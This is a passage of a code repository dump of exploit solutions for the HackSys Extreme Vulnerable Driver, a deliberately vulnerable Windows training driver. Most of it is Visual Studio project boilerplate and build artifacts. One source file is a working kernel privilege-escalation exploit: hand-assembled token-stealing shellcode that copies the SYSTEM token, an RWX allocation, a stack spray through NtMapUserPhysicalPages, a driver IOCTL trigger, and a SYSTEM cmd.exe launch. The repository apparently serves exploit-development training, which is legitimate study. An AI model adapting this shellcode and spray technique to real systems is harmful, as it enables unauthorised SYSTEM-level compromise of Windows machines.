 16 |     <ProjectConfiguration Include="Release|x64">
 17 |       <Configuration>Release</Configuration>
 18 |       <Platform>x64</Platform>
 19 |     </ProjectConfiguration>
 20 |   </ItemGroup>
 21 |   <PropertyGroup Label="Globals">
 22 |     <VCProjectVersion>15.0</VCProjectVersion>
 23 |     <ProjectGuid>{2758AB0C-303D-4E4C-B316-E1FA321E93E2}</ProjectGuid>
 24 |     <Keyword>Win32Proj</Keyword>
 25 |     <RootNamespace>HEVDUaFExploit</RootNamespace>
 26 |     <WindowsTargetPlatformVersion>10.0.15063.0</WindowsTargetPlatformVersion>
 27 |   </PropertyGroup>
 28 |   <Import Project="$(VCTargetsPath)\Microsoft.Cpp.Default.props" />
 29 |   <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'" Label="Configuration">
 30 |     <ConfigurationType>Application</ConfigurationType>
 31 |     <UseDebugLibraries>true</UseDebugLibraries>
 32 |     <PlatformToolset>v141</PlatformToolset>
 33 |     <CharacterSet>Unicode</CharacterSet>
 34 |   </PropertyGroup>
 35 |   <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'" Label="Configuration">
 36 |     <ConfigurationType>Application</ConfigurationType>
 37 |     <UseDebugLibraries>false</UseDebugLibraries>
 38 |     <PlatformToolset>v141</PlatformToolset>
 39 |     <WholeProgramOptimization>true</WholeProgramOptimization>
 40 |     <CharacterSet>Unicode</CharacterSet>
 41 |   </PropertyGroup>
 42 |   <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'" Label="Configuration">
 43 |     <ConfigurationType>Application</ConfigurationType>
 44 |     <UseDebugLibraries>true</UseDebugLibraries>
 45 |     <PlatformToolset>v141</PlatformToolset>
 46 |     <CharacterSet>Unicode</CharacterSet>
 47 |   </PropertyGroup>
 48 |   <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'" Label="Configuration">
 49 |     <ConfigurationType>Application</ConfigurationType>
 50 |     <UseDebugLibraries>false</UseDebugLibraries>
 51 |     <PlatformToolset>v141</PlatformToolset>
 52 |     <WholeProgramOptimization>true</WholeProgramOptimization>
 53 |     <CharacterSet>Unicode</CharacterSet>
 54 |   </PropertyGroup>
 55 |   <Import Project="$(VCTargetsPath)\Microsoft.Cpp.props" />
 56 |   <ImportGroup Label="ExtensionSettings">
 57 |   </ImportGroup>
 58 |   <ImportGroup Label="Shared">
 59 |   </ImportGroup>
 60 |   <ImportGroup Label="PropertySheets" Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">
 61 |     <Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
 62 |   </ImportGroup>
 63 |   <ImportGroup Label="PropertySheets" Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">
 64 |     <Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
 65 |   </ImportGroup>
 66 |   <ImportGroup Label="PropertySheets" Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">
 67 |     <Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
 68 |   </ImportGroup>
 69 |   <ImportGroup Label="PropertySheets" Condition="'$(Configuration)|$(Platform)'=='Release|x64'">
 70 |     <Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
 71 |   </ImportGroup>
 72 |   <PropertyGroup Label="UserMacros" />
 73 |   <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">
 74 |     <LinkIncremental>true</LinkIncremental>
 75 |   </PropertyGroup>
 76 |   <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">
 77 |     <LinkIncremental>true</LinkIncremental>
 78 |   </PropertyGroup>
 79 |   <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">
 80 |     <LinkIncremental>false</LinkIncremental>
 81 |   </PropertyGroup>
 82 |   <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'">
 83 |     <LinkIncremental>false</LinkIncremental>
 84 |   </PropertyGroup>
 85 |   <ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">
 86 |     <ClCompile>
 87 |       <PrecompiledHeader>Use</PrecompiledHeader>
 88 |       <WarningLevel>Level3</WarningLevel>
 89 |       <Optimization>Disabled</Optimization>
 90 |       <PreprocessorDefinitions>WIN32;_DEBUG;_CONSOLE;%(PreprocessorDefinitions)</PreprocessorDefinitions>
 91 |     </ClCompile>
 92 |     <Link>
 93 |       <SubSystem>Console</SubSystem>
 94 |     </Link>
 95 |   </ItemDefinitionGroup>
 96 |   <ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">
 97 |     <ClCompile>
 98 |       <PrecompiledHeader>Use</PrecompiledHeader>
 99 |       <WarningLevel>Level3</WarningLevel>
100 |       <Optimization>Disabled</Optimization>
101 |       <PreprocessorDefinitions>_DEBUG;_CONSOLE;%(PreprocessorDefinitions)</PreprocessorDefinitions>
102 |     </ClCompile>
103 |     <Link>
104 |       <SubSystem>Console</SubSystem>
105 |     </Link>
106 |   </ItemDefinitionGroup>
107 |   <ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">
108 |     <ClCompile>
109 |       <WarningLevel>Level3</WarningLevel>
110 |       <PrecompiledHeader>Use</PrecompiledHeader>
111 |       <Optimization>MaxSpeed</Optimization>
112 |       <FunctionLevelLinking>true</FunctionLevelLinking>
113 |       <IntrinsicFunctions>true</IntrinsicFunctions>
114 |       <PreprocessorDefinitions>WIN32;NDEBUG;_CONSOLE;%(PreprocessorDefinitions)</PreprocessorDefinitions>
115 |     </ClCompile>
116 |     <Link>
117 |       <SubSystem>Console</SubSystem>
118 |       <EnableCOMDATFolding>true</EnableCOMDATFolding>
119 |       <OptimizeReferences>true</OptimizeReferences>
120 |     </Link>
121 |   </ItemDefinitionGroup>
122 |   <ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'">
123 |     <ClCompile>
124 |       <WarningLevel>Level3</WarningLevel>
125 |       <PrecompiledHeader>Use</PrecompiledHeader>
126 |       <Optimization>MaxSpeed</Optimization>
127 |       <FunctionLevelLinking>true</FunctionLevelLinking>
128 |       <IntrinsicFunctions>true</IntrinsicFunctions>
129 |       <PreprocessorDefinitions>NDEBUG;_CONSOLE;%(PreprocessorDefinitions)</PreprocessorDefinitions>
130 |     </ClCompile>
131 |     <Link>
132 |       <SubSystem>Console</SubSystem>
133 |       <EnableCOMDATFolding>true</EnableCOMDATFolding>
134 |       <OptimizeReferences>true</OptimizeReferences>
135 |     </Link>
136 |   </ItemDefinitionGroup>
137 |   <ItemGroup>
138 |     <Text Include="ReadMe.txt" />
139 |   </ItemGroup>
140 |   <ItemGroup>
141 |     <ClInclude Include="stdafx.h" />
142 |     <ClInclude Include="targetver.h" />
143 |   </ItemGroup>
144 |   <ItemGroup>
145 |     <ClCompile Include="HEVD-UaF-Exploit.cpp" />
146 |     <ClCompile Include="stdafx.cpp">
147 |       <PrecompiledHeader Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">Create</PrecompiledHeader>
148 |       <PrecompiledHeader Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">Create</PrecompiledHeader>
149 |       <PrecompiledHeader Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">Create</PrecompiledHeader>
150 |       <PrecompiledHeader Condition="'$(Configuration)|$(Platform)'=='Release|x64'">Create</PrecompiledHeader>
151 |     </ClCompile>
152 |   </ItemGroup>
153 |   <Import Project="$(VCTargetsPath)\Microsoft.Cpp.targets" />
154 |   <ImportGroup Label="ExtensionTargets">
155 |   </ImportGroup>
156 | </Project>


--------------------------------------------------------------------------------
/HEVD-UaF-Exploit/HEVD-UaF-Exploit/HEVD-UaF-Exploit.vcxproj.filters:
--------------------------------------------------------------------------------
 1 | <?xml version="1.0" encoding="utf-8"?>
 2 | <Project ToolsVersion="4.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
 3 |   <ItemGroup>
 4 |     <Filter Include="Source Files">
 5 |       <UniqueIdentifier>{4FC737F1-C7A5-4376-A066-2A32D752A2FF}</UniqueIdentifier>
 6 |       <Extensions>cpp;c;cc;cxx;def;odl;idl;hpj;bat;asm;asmx</Extensions>
 7 |     </Filter>
 8 |     <Filter Include="Header Files">
 9 |       <UniqueIdentifier>{93995380-89BD-4b04-88EB-625FBE52EBFB}</UniqueIdentifier>
10 |       <Extensions>h;hh;hpp;hxx;hm;inl;inc;xsd</Extensions>
11 |     </Filter>
12 |     <Filter Include="Resource Files">
13 |       <UniqueIdentifier>{67DA6AB6-F800-4c08-8B7A-83BB121AAD01}</UniqueIdentifier>
14 |       <Extensions>rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms</Extensions>
15 |     </Filter>
16 |   </ItemGroup>
17 |   <ItemGroup>
18 |     <Text Include="ReadMe.txt" />
19 |   </ItemGroup>
20 |   <ItemGroup>
21 |     <ClInclude Include="stdafx.h">
22 |       <Filter>Header Files</Filter>
23 |     </ClInclude>
24 |     <ClInclude Include="targetver.h">
25 |       <Filter>Header Files</Filter>
26 |     </ClInclude>
27 |   </ItemGroup>
28 |   <ItemGroup>
29 |     <ClCompile Include="stdafx.cpp">
30 |       <Filter>Source Files</Filter>
31 |     </ClCompile>
32 |     <ClCompile Include="HEVD-UaF-Exploit.cpp">
33 |       <Filter>Source Files</Filter>
34 |     </ClCompile>
35 |   </ItemGroup>
36 | </Project>


--------------------------------------------------------------------------------
/HEVD-UaF-Exploit/HEVD-UaF-Exploit/ReadMe.txt:
--------------------------------------------------------------------------------
 1 | ========================================================================
 2 |     CONSOLE APPLICATION : HEVD-UaF-Exploit Project Overview
 3 | ========================================================================
 4 | 
 5 | AppWizard has created this HEVD-UaF-Exploit application for you.
 6 | 
 7 | This file contains a summary of what you will find in each of the files that
 8 | make up your HEVD-UaF-Exploit application.
 9 | 
10 | 
11 | HEVD-UaF-Exploit.vcxproj
12 |     This is the main project file for VC++ projects generated using an Application Wizard.
13 |     It contains information about the version of Visual C++ that generated the file, and
14 |     information about the platforms, configurations, and project features selected with the
15 |     Application Wizard.
16 | 
17 | HEVD-UaF-Exploit.vcxproj.filters
18 |     This is the filters file for VC++ projects generated using an Application Wizard. 
19 |     It contains information about the association between the files in your project 
20 |     and the filters. This association is used in the IDE to show grouping of files with
21 |     similar extensions under a specific node (for e.g. ".cpp" files are associated with the
22 |     "Source Files" filter).
23 | 
24 | HEVD-UaF-Exploit.cpp
25 |     This is the main application source file.
26 | 
27 | /////////////////////////////////////////////////////////////////////////////
28 | Other standard files:
29 | 
30 | StdAfx.h, StdAfx.cpp
31 |     These files are used to build a precompiled header (PCH) file
32 |     named HEVD-UaF-Exploit.pch and a precompiled types file named StdAfx.obj.
33 | 
34 | /////////////////////////////////////////////////////////////////////////////
35 | Other notes:
36 | 
37 | AppWizard uses "TODO:" comments to indicate parts of the source code you
38 | should add to or customize.
39 | 
40 | /////////////////////////////////////////////////////////////////////////////
41 | 


--------------------------------------------------------------------------------
/HEVD-UaF-Exploit/HEVD-UaF-Exploit/stdafx.cpp:
--------------------------------------------------------------------------------
1 | // stdafx.cpp : source file that includes just the standard includes
2 | // HEVD-UaF-Exploit.pch will be the pre-compiled header
3 | // stdafx.obj will contain the pre-compiled type information
4 | 
5 | #include "stdafx.h"
6 | 
7 | // TODO: reference any additional headers you need in STDAFX.H
8 | // and not in this file
9 | 


--------------------------------------------------------------------------------
/HEVD-UaF-Exploit/HEVD-UaF-Exploit/stdafx.h:
--------------------------------------------------------------------------------
 1 | // stdafx.h : include file for standard system include files,
 2 | // or project specific include files that are used frequently, but
 3 | // are changed infrequently
 4 | //
 5 | 
 6 | #pragma once
 7 | 
 8 | #include "targetver.h"
 9 | 
10 | #include <stdio.h>
11 | #include <tchar.h>
12 | 
13 | 
14 | 
15 | // TODO: reference additional headers your program requires here
16 | 


--------------------------------------------------------------------------------
/HEVD-UaF-Exploit/HEVD-UaF-Exploit/targetver.h:
--------------------------------------------------------------------------------
1 | #pragma once
2 | 
3 | // Including SDKDDKVer.h defines the highest available Windows platform.
4 | 
5 | // If you wish to build your application for a previous Windows platform, include WinSDKVer.h and
6 | // set the _WIN32_WINNT macro to the platform you wish to support before including SDKDDKVer.h.
7 | 
8 | #include <SDKDDKVer.h>
9 | 


--------------------------------------------------------------------------------
/HEVD-Unitialized-Stack-Variable/Debug/HEVD-Unitialized-Stack-Variable.exe:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/tekwizz123/HEVD-Exploit-Solutions/65992fd3802fb8204fac3a96ead19279db78bdfc/HEVD-Unitialized-Stack-Variable/Debug/HEVD-Unitialized-Stack-Variable.exe


--------------------------------------------------------------------------------
/HEVD-Unitialized-Stack-Variable/Debug/HEVD-Unitialized-Stack-Variable.ilk:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/tekwizz123/HEVD-Exploit-Solutions/65992fd3802fb8204fac3a96ead19279db78bdfc/HEVD-Unitialized-Stack-Variable/Debug/HEVD-Unitialized-Stack-Variable.ilk


--------------------------------------------------------------------------------
/HEVD-Unitialized-Stack-Variable/Debug/HEVD-Unitialized-Stack-Variable.pdb:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/tekwizz123/HEVD-Exploit-Solutions/65992fd3802fb8204fac3a96ead19279db78bdfc/HEVD-Unitialized-Stack-Variable/Debug/HEVD-Unitialized-Stack-Variable.pdb


--------------------------------------------------------------------------------
/HEVD-Unitialized-Stack-Variable/HEVD-Unitialized-Stack-Variable.sln:
--------------------------------------------------------------------------------
 1 | 
 2 | Microsoft Visual Studio Solution File, Format Version 12.00
 3 | # Visual Studio 15
 4 | VisualStudioVersion = 15.0.26430.15
 5 | MinimumVisualStudioVersion = 10.0.40219.1
 6 | Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "HEVD-Unitialized-Stack-Variable", "HEVD-Unitialized-Stack-Variable\HEVD-Unitialized-Stack-Variable.vcxproj", "{751E06F3-0298-47C9-BC0D-67E08777E6F5}"
 7 | EndProject
 8 | Global
 9 | 	GlobalSection(SolutionConfigurationPlatforms) = preSolution
10 | 		Debug|x64 = Debug|x64
11 | 		Debug|x86 = Debug|x86
12 | 		Release|x64 = Release|x64
13 | 		Release|x86 = Release|x86
14 | 	EndGlobalSection
15 | 	GlobalSection(ProjectConfigurationPlatforms) = postSolution
16 | 		{751E06F3-0298-47C9-BC0D-67E08777E6F5}.Debug|x64.ActiveCfg = Debug|x64
17 | 		{751E06F3-0298-47C9-BC0D-67E08777E6F5}.Debug|x64.Build.0 = Debug|x64
18 | 		{751E06F3-0298-47C9-BC0D-67E08777E6F5}.Debug|x86.ActiveCfg = Debug|Win32
19 | 		{751E06F3-0298-47C9-BC0D-67E08777E6F5}.Debug|x86.Build.0 = Debug|Win32
20 | 		{751E06F3-0298-47C9-BC0D-67E08777E6F5}.Release|x64.ActiveCfg = Release|x64
21 | 		{751E06F3-0298-47C9-BC0D-67E08777E6F5}.Release|x64.Build.0 = Release|x64
22 | 		{751E06F3-0298-47C9-BC0D-67E08777E6F5}.Release|x86.ActiveCfg = Release|Win32
23 | 		{751E06F3-0298-47C9-BC0D-67E08777E6F5}.Release|x86.Build.0 = Release|Win32
24 | 	EndGlobalSection
25 | 	GlobalSection(SolutionProperties) = preSolution
26 | 		HideSolutionNode = FALSE
27 | 	EndGlobalSection
28 | EndGlobal
29 | 


--------------------------------------------------------------------------------
/HEVD-Unitialized-Stack-Variable/HEVD-Unitialized-Stack-Variable/Debug/HEVD-Uni.751E06F3.tlog/CL.command.1.tlog:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/tekwizz123/HEVD-Exploit-Solutions/65992fd3802fb8204fac3a96ead19279db78bdfc/HEVD-Unitialized-Stack-Variable/HEVD-Unitialized-Stack-Variable/Debug/HEVD-Uni.751E06F3.tlog/CL.command.1.tlog


--------------------------------------------------------------------------------
/HEVD-Unitialized-Stack-Variable/HEVD-Unitialized-Stack-Variable/Debug/HEVD-Uni.751E06F3.tlog/CL.read.1.tlog:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/tekwizz123/HEVD-Exploit-Solutions/65992fd3802fb8204fac3a96ead19279db78bdfc/HEVD-Unitialized-Stack-Variable/HEVD-Unitialized-Stack-Variable/Debug/HEVD-Uni.751E06F3.tlog/CL.read.1.tlog


--------------------------------------------------------------------------------
/HEVD-Unitialized-Stack-Variable/HEVD-Unitialized-Stack-Variable/Debug/HEVD-Uni.751E06F3.tlog/CL.write.1.tlog:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/tekwizz123/HEVD-Exploit-Solutions/65992fd3802fb8204fac3a96ead19279db78bdfc/HEVD-Unitialized-Stack-Variable/HEVD-Unitialized-Stack-Variable/Debug/HEVD-Uni.751E06F3.tlog/CL.write.1.tlog


--------------------------------------------------------------------------------
/HEVD-Unitialized-Stack-Variable/HEVD-Unitialized-Stack-Variable/Debug/HEVD-Uni.751E06F3.tlog/HEVD-Unitialized-Stack-Variable.lastbuildstate:
--------------------------------------------------------------------------------
1 | #TargetFrameworkVersion=v4.0:PlatformToolSet=v141:EnableManagedIncrementalBuild=false:VCToolArchitecture=Native32Bit:WindowsTargetPlatformVersion=10.0.15063.0
2 | Debug|Win32|C:\Users\gwilcox\documents\visual studio 2017\Projects\HEVD-Unitialized-Stack-Variable\|
3 | 


--------------------------------------------------------------------------------
/HEVD-Unitialized-Stack-Variable/HEVD-Unitialized-Stack-Variable/Debug/HEVD-Uni.751E06F3.tlog/link.command.1.tlog:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/tekwizz123/HEVD-Exploit-Solutions/65992fd3802fb8204fac3a96ead19279db78bdfc/HEVD-Unitialized-Stack-Variable/HEVD-Unitialized-Stack-Variable/Debug/HEVD-Uni.751E06F3.tlog/link.command.1.tlog


--------------------------------------------------------------------------------
/HEVD-Unitialized-Stack-Variable/HEVD-Unitialized-Stack-Variable/Debug/HEVD-Uni.751E06F3.tlog/link.read.1.tlog:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/tekwizz123/HEVD-Exploit-Solutions/65992fd3802fb8204fac3a96ead19279db78bdfc/HEVD-Unitialized-Stack-Variable/HEVD-Unitialized-Stack-Variable/Debug/HEVD-Uni.751E06F3.tlog/link.read.1.tlog


--------------------------------------------------------------------------------
/HEVD-Unitialized-Stack-Variable/HEVD-Unitialized-Stack-Variable/Debug/HEVD-Uni.751E06F3.tlog/link.write.1.tlog:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/tekwizz123/HEVD-Exploit-Solutions/65992fd3802fb8204fac3a96ead19279db78bdfc/HEVD-Unitialized-Stack-Variable/HEVD-Unitialized-Stack-Variable/Debug/HEVD-Uni.751E06F3.tlog/link.write.1.tlog


--------------------------------------------------------------------------------
/HEVD-Unitialized-Stack-Variable/HEVD-Unitialized-Stack-Variable/Debug/HEVD-Unitialized-Stack-Variable.log:
--------------------------------------------------------------------------------
1 |   HEVD-Unitialized-Stack-Variable.cpp
2 | c:\users\gwilcox\documents\visual studio 2017\projects\hevd-unitialized-stack-variable\hevd-unitialized-stack-variable\hevd-unitialized-stack-variable.cpp(24): warning C4477: 'printf' : format string '%i' requires an argument of type 'int', but variadic argument 1 has type 'HANDLE'
3 |   HEVD-Unitialized-Stack-Variable.vcxproj -> C:\Users\gwilcox\documents\visual studio 2017\Projects\HEVD-Unitialized-Stack-Variable\Debug\HEVD-Unitialized-Stack-Variable.exe
4 |   HEVD-Unitialized-Stack-Variable.vcxproj -> C:\Users\gwilcox\documents\visual studio 2017\Projects\HEVD-Unitialized-Stack-Variable\Debug\HEVD-Unitialized-Stack-Variable.pdb (Partial PDB)
5 | 


--------------------------------------------------------------------------------
/HEVD-Unitialized-Stack-Variable/HEVD-Unitialized-Stack-Variable/Debug/HEVD-Unitialized-Stack-Variable.obj:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/tekwizz123/HEVD-Exploit-Solutions/65992fd3802fb8204fac3a96ead19279db78bdfc/HEVD-Unitialized-Stack-Variable/HEVD-Unitialized-Stack-Variable/Debug/HEVD-Unitialized-Stack-Variable.obj


--------------------------------------------------------------------------------
/HEVD-Unitialized-Stack-Variable/HEVD-Unitialized-Stack-Variable/Debug/HEVD-Unitialized-Stack-Variable.pch:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/tekwizz123/HEVD-Exploit-Solutions/65992fd3802fb8204fac3a96ead19279db78bdfc/HEVD-Unitialized-Stack-Variable/HEVD-Unitialized-Stack-Variable/Debug/HEVD-Unitialized-Stack-Variable.pch


--------------------------------------------------------------------------------
/HEVD-Unitialized-Stack-Variable/HEVD-Unitialized-Stack-Variable/Debug/stdafx.obj:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/tekwizz123/HEVD-Exploit-Solutions/65992fd3802fb8204fac3a96ead19279db78bdfc/HEVD-Unitialized-Stack-Variable/HEVD-Unitialized-Stack-Variable/Debug/stdafx.obj


--------------------------------------------------------------------------------
/HEVD-Unitialized-Stack-Variable/HEVD-Unitialized-Stack-Variable/Debug/vc141.idb:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/tekwizz123/HEVD-Exploit-Solutions/65992fd3802fb8204fac3a96ead19279db78bdfc/HEVD-Unitialized-Stack-Variable/HEVD-Unitialized-Stack-Variable/Debug/vc141.idb


--------------------------------------------------------------------------------
/HEVD-Unitialized-Stack-Variable/HEVD-Unitialized-Stack-Variable/Debug/vc141.pdb:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/tekwizz123/HEVD-Exploit-Solutions/65992fd3802fb8204fac3a96ead19279db78bdfc/HEVD-Unitialized-Stack-Variable/HEVD-Unitialized-Stack-Variable/Debug/vc141.pdb


--------------------------------------------------------------------------------
/HEVD-Unitialized-Stack-Variable/HEVD-Unitialized-Stack-Variable/HEVD-Unitialized-Stack-Variable.cpp:
--------------------------------------------------------------------------------
 1 | #include "stdafx.h"
 2 | #include "windows.h"
 3 | 
 4 | /*
 5 | 	Need to define NtMapUserPhysicalPages and its expected parameters here as else the compiler won't know how to call this.
 6 | 	NTSTATUS is return type.
 7 | 	WINAPI is the calling convention.
 8 | 	(*_NtMapUserPhysicalPages) to define this as a function pointer and not a function taking in a pointer as its argument.
 9 | */
10 | typedef NTSTATUS(WINAPI *_NtMapUserPhysicalPages)(
11 | 	PINT BaseAddress,
12 | 	UINT32 NumberOfPages,
13 | 	PBYTE PageFrameNumbers);
14 | 
15 | int main()
16 | {
17 | 	printf("Exploiting uninitialized stack variables in HEVD\r\n");
18 | 	printf("Opening handle to driver\r\n");
19 | 	HANDLE driverHandle = CreateFileA("\\\\.\\HackSysExtremeVulnerableDriver", FILE_READ_ACCESS | FILE_WRITE_ACCESS, FILE_SHARE_READ | FILE_SHARE_WRITE, NULL, OPEN_EXISTING, FILE_FLAG_OVERLAPPED | FILE_ATTRIBUTE_NORMAL, NULL);
20 | 	if (driverHandle == INVALID_HANDLE_VALUE) {
21 | 		printf("Unable to get handle to HEVD driver. Exiting. \r\n");
22 | 		return 1;
23 | 	}
24 | 	printf("Got valid handle: %i\r\n", driverHandle);
25 | 	char theBuffer[5] = "\x44\x45\x46\x47"; // Some bytes so we don't match the check for 0xBAD0B0B0
26 | 	
27 | 	printf("Getting address of NtMapUserPhysicalPages\r\n");
28 | 	/*
29 | 		Use GetModuleHandle to get handle to address of ntdll.dll, then use GetProcAddress to find the address of NtMapUserPhysicalPages from
30 | 		this DLL. Finally, cast the address to a _NtMapUserPhysicalPages function pointer so that the address appears to be a pointer to the NtMapUserPhysicalPages function in memory,
31 | 		and save this value into the variable NtMapUserPhysicalPages for later use.
32 | 	*/
33 | 	_NtMapUserPhysicalPages NtMapUserPhysicalPages = (_NtMapUserPhysicalPages) GetProcAddress(GetModuleHandleW(L"ntdll.dll"), "NtMapUserPhysicalPages");
34 | 	
35 | 	printf("Allocating shellcode....\r\n");
36 | 	char shellcode[60] = (
37 | 		"\x60" // PUSHAD
38 | 		"\x64\xA1\x24\x01\x00\x00" // MOV EAX, fs:[KTHREAD_OFFSET]
39 | 		"\x8B\x40\x50" // MOV EAX, [EAX + EPROCESS_OFFSET]
40 | 		"\x89\xC1" // mov ecx, eax (Current EPROCESS structure)
41 | 		"\x8B\x98\xF8\x00\x00\x00" // mov ebx, [eax + TOKEN_OFFSET]
42 | 								   // #---[Copy System PID token]
43 | 		"\xBA\x04\x00\x00\x00" // mov edx, 4 (SYSTEM PID)
44 | 		"\x8B\x80\xB8\x00\x00\x00" // mov eax, [eax + FLINK_OFFSET] <-|
45 | 		"\x2D\xB8\x00\x00\x00" //               sub eax, FLINK_OFFSET |
46 | 		"\x39\x90\xB4\x00\x00\x00" //      cmp[eax + PID_OFFSET], edx |
47 | 		"\x75\xED" // jnz                                          -> |
48 | 		"\x8B\x90\xF8\x00\x00\x00" // mov edx, [eax + TOKEN_OFFSET]
49 | 		"\x89\x91\xF8\x00\x00\x00" // mov[ecx + TOKEN_OFFSET], edx
50 | 								   //#---[Recover]
51 | 		"\x61" // popad
52 | 		"\x31\xC0" // Set NTSTATUS->STATUS_SUCCESS so calling function thinks we exited successfully
53 | 		"\xC3" // RET
54 | 	);
55 | 	printf("Shellcode size: %i\r\n", sizeof(shellcode));
56 | 
57 | 	printf("Reserving RWX memory for shellcode with VirtualAlloc\r\n");
58 | 	LPVOID shellcodeAddress = VirtualAlloc(NULL, sizeof(shellcode), MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);
59 | 	printf("Copying shellcode into this memory\r\n");
60 | 	memcpy(shellcodeAddress, shellcode, sizeof(shellcode));
61 | 	LPVOID sourceAddress = &shellcodeAddress;
62 | 
63 | 	printf("Spraying stack\r\n");
64 | 	int BaseAddress = 0; // We just need a pointer to 0, so lets first set up an integer which contains 0. Don't know if NULL would work here, imagine it should.
65 | 	char theSpray[4028] = { 0 }; // Set up our character array and initialize it using {0} to set every field to 0.
66 | 	printf("Setting up buffer theSpray and calling NtMapUserPhysicalPages\r\n");
67 | 	for (int i = 0; i < 1007; i++) { /* Don't ask me why this has to be 1007, I have a feeling I messed up the logic here, but this will ensure all the fields are filled
68 | 									 without copying into the memory of BaseAddress */
69 | 		memcpy((theSpray + (i * 4)), sourceAddress, 4); /* Copy source address into the memory of theSpray, starting at the memory pointed to by theSpray, then theSpray+4, then theSpray+8, etc.
70 | 														Aka simple loop to fill all of theSpray with the address of our shellcode */
71 | 	}
72 | 	printf("Going silent to try keep stack steady.\r\n"); // If we keep using printf we will push stuff onto the stack and change it therefore stop using printf to keep stack steady.
73 | 	NtMapUserPhysicalPages(&BaseAddress, 1024, (PBYTE)&theSpray); // Use a pointer to the int value 0 to ensure XXX, 1024 for the number of pages, so total memory will be 1024 * SIZE_OF_PAGE, aka 1024*4. 
74 | 																  // Finally we need a PBYTE pointer to the array we are using to make changes, which is third parameter.
75 | 
76 | 	DWORD bytesReturned = 0; // Just need a space to hold the number of bytes returned so lets use a temp DWORD variable.
77 | 	DeviceIoControl(driverHandle, 0x22202F, &theBuffer, sizeof(theBuffer), NULL, 0, &bytesReturned, (LPOVERLAPPED)NULL); // This is fairly self explanatory from previous examples. Won't cover it again. Func number is 0x22202F here.
78 | 
79 | 	printf("Hopefully that should have worked.\r\nCreating cmd.exe process\r\n");
80 | 	PROCESS_INFORMATION pi;
81 | 	ZeroMemory(&pi, sizeof(pi));
82 | 	STARTUPINFOA si;
83 | 	ZeroMemory(&si, sizeof(si));
84 | 	si.cb = sizeof(si);
85 | 	CreateProcessA("C:\\Windows\\System32\\cmd.exe", NULL, NULL, NULL, 0, CREATE_NEW_CONSOLE, NULL, NULL, &si, &pi);
86 | 
87 |     return 0;
88 | }
89 | 
90 | 


--------------------------------------------------------------------------------
/HEVD-Unitialized-Stack-Variable/HEVD-Unitialized-Stack-Variable/HEVD-Unitialized-Stack-Variable.vcxproj:
--------------------------------------------------------------------------------
  1 | <?xml version="1.0" encoding="utf-8"?>
  2 | <Project DefaultTargets="Build" ToolsVersion="15.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
  3 |   <ItemGroup Label="ProjectConfigurations">
  4 |     <ProjectConfiguration Include="Debug|Win32">
  5 |       <Configuration>Debug</Configuration>
  6 |       <Platform>Win32</Platform>
  7 |     </ProjectConfiguration>
  8 |     <ProjectConfiguration Include="Release|Win32">
  9 |       <Configuration>Release</Configuration>
 10 |       <Platform>Win32</Platform>
 11 |     </ProjectConfiguration>
 12 |     <ProjectConfiguration Include="Debug|x64">
 13 |       <Configuration>Debug</Configuration>
 14 |       <Platform>x64</Platform>
 15 |     </ProjectConfiguration>
 16 |     <ProjectConfiguration Include="Release|x64">
 17 |       <Configuration>Release</Configuration>
 18 |       <Platform>x64</Platform>
 19 |     </ProjectConfiguration>
 20 |   </ItemGroup>
 21 |   <PropertyGroup Label="Globals">
 22 |     <VCProjectVersion>15.0</VCProjectVersion>
 23 |     <ProjectGuid>{751E06F3-0298-47C9-BC0D-67E08777E6F5}</ProjectGuid>
 24 |     <Keyword>Win32Proj</Keyword>
 25 |     <RootNamespace>HEVDUnitializedStackVariable</RootNamespace>
